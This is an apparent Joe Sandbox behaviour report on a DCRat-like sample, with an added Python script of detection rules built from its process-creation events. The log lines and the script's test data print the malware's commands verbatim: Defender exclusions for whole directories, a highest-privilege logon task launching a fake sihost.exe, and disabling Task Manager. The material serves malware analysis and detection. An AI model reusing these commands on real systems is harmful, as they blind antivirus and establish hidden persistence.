Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
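Added example (not part of the Joe Sandbox report and not code from the sample): Python detection logic for the installation chain listed above, run offline over constructed Sysmon Event ID 1 style records. The CommandLine values are copied from the process-creation entries in this report; the Image/ParentImage/CommandLine field names, the ParentImage values, the WmiPrvSE.exe-parented record, the trusted-directory prefixes and the small set of impersonated system binary names are assumptions made for the example.

```python
"""Detection rules for the DCRat installation chain in this report, run over
constructed Sysmon Event ID 1 style records (added example, not Joe Sandbox code)."""
import re

# Constructed events. CommandLine values come from the report; ParentImage
# values and the WmiPrvSE.exe-parented record are assumptions.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\reg.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\fontdriversavescrt\ComComponentDriverInto.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\fontdriversavescrt\ComComponentDriverInto.exe",
     "CommandLine": "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/'"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\fontdriversavescrt\ComComponentDriverInto.exe",
     "CommandLine": "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:\\fontdriversavescrt\\WmiPrvSE.exe'"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\fontdriversavescrt\ComComponentDriverInto.exe",
     "CommandLine": "schtasks.exe /create /tn \"sihost\" /sc ONLOGON /tr \"'C:\\Users\\Default User\\Documents\\sihost.exe'\" /rl HIGHEST /f"},
    {"Image": r"C:\Users\Default\Documents\sihost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'"C:\Users\Default User\Documents\sihost.exe"'},
    {"Image": r"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",  # assumed: launched via Win32_Process::Create
     "CommandLine": r'"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"'},
    # Benign control: the genuine sihost.exe must not fire any rule.
    {"Image": r"C:\Windows\System32\sihost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "sihost.exe"},
]

SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\system32\\wbem"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SYSTEM_NAMES = {"sihost.exe", "wmiprvse.exe", "securityhealthsystray.exe"}  # illustrative subset


def norm(path):
    """Lower-case, backslash-only, no trailing separator."""
    return path.replace("/", "\\").strip().rstrip("\\").lower()


def split_path(path):
    """(directory, basename) of a normalized path."""
    head, _, tail = norm(path).rpartition("\\")
    return head, tail


def is_trusted_dir(directory):
    return (directory + "\\").startswith(TRUSTED_PREFIXES)


EXCLUSION_RE = re.compile(r"-ExclusionPath\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)
TASK_TARGET_RE = re.compile(r"/tr\s+\"?'?([^\"']+)", re.I)


def rule_defender_exclusion(ev):
    cl = ev["CommandLine"]
    m = EXCLUSION_RE.search(cl)
    if "add-mppreference" not in cl.lower() or not m:
        return []
    path = norm(next((g for g in m.groups() if g), ""))
    if not path:
        return []
    # A drive root or a top-level directory shields most of the disk from Defender.
    broad = re.fullmatch(r"[a-z]:(\\[^\\]+)?", path) is not None
    return [("defender_exclusion", "high" if broad else "medium", path)]


def rule_disable_taskmgr(ev):
    cl = ev["CommandLine"].lower()
    if split_path(ev["Image"])[1] == "reg.exe" and "disabletaskmgr" in cl and re.search(r"/d\s+0*1\b", cl):
        return [("taskmgr_disabled", "medium", "DisableTaskMgr=1")]
    return []


def rule_logon_task(ev):
    cl = ev["CommandLine"]
    m = TASK_TARGET_RE.search(cl)
    if split_path(ev["Image"])[1] != "schtasks.exe" or "/create" not in cl.lower() or not m:
        return []
    # Highest run level plus a target outside trusted directories: persistence, not admin work.
    if "/rl highest" in cl.lower() and not is_trusted_dir(split_path(m.group(1))[0]):
        return [("highest_priv_task_untrusted_path", "high", norm(m.group(1)))]
    return []


def rule_masquerade(ev):
    directory, name = split_path(ev["Image"])
    if name in SYSTEM_NAMES and directory not in SYSTEM_DIRS:
        return [("system_name_unexpected_dir", "high", ev["Image"])]
    return []


def rule_csc_from_temp(ev):
    parent_dir, _ = split_path(ev["ParentImage"])
    if (split_path(ev["Image"])[1] == "csc.exe"
            and "\\appdata\\local\\temp\\" in ev["CommandLine"].lower()
            and not is_trusted_dir(parent_dir)):
        return [("csc_compile_from_temp", "medium", ev["ParentImage"])]
    return []


def rule_wmi_spawn(ev):
    child_dir, _ = split_path(ev["Image"])
    if split_path(ev["ParentImage"])[1] == "wmiprvse.exe" and child_dir not in SYSTEM_DIRS:
        return [("wmi_spawned_process", "medium", ev["Image"])]
    return []


RULES = (rule_defender_exclusion, rule_disable_taskmgr, rule_logon_task,
         rule_masquerade, rule_csc_from_temp, rule_wmi_spawn)


def evaluate(events):
    """Return one (rule, severity, detail) tuple per hit, in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            hits.extend(rule(ev))
    return hits


if __name__ == "__main__":
    for name, severity, detail in evaluate(EVENTS):
        print(f"[{severity:6}] {name}: {detail}")
```

Running the file prints seven hits and nothing for the genuine sihost.exe control: the drive-root exclusion, the ONLOGON task pointing into a user profile directory and sihost.exe outside System32 are high severity; the per-file exclusion, the csc.exe compile from a Temp response file and the WmiPrvSE.exe-parented child are medium. The exclusion rule only matches the plain `-Command` form seen in this report; a production version would also decode `-EncodedCommand` payloads and match Set-MpPreference, and would take its trusted-directory and system-binary lists from the EDR's own inventory rather than the constants above.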
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: version.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: slc.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
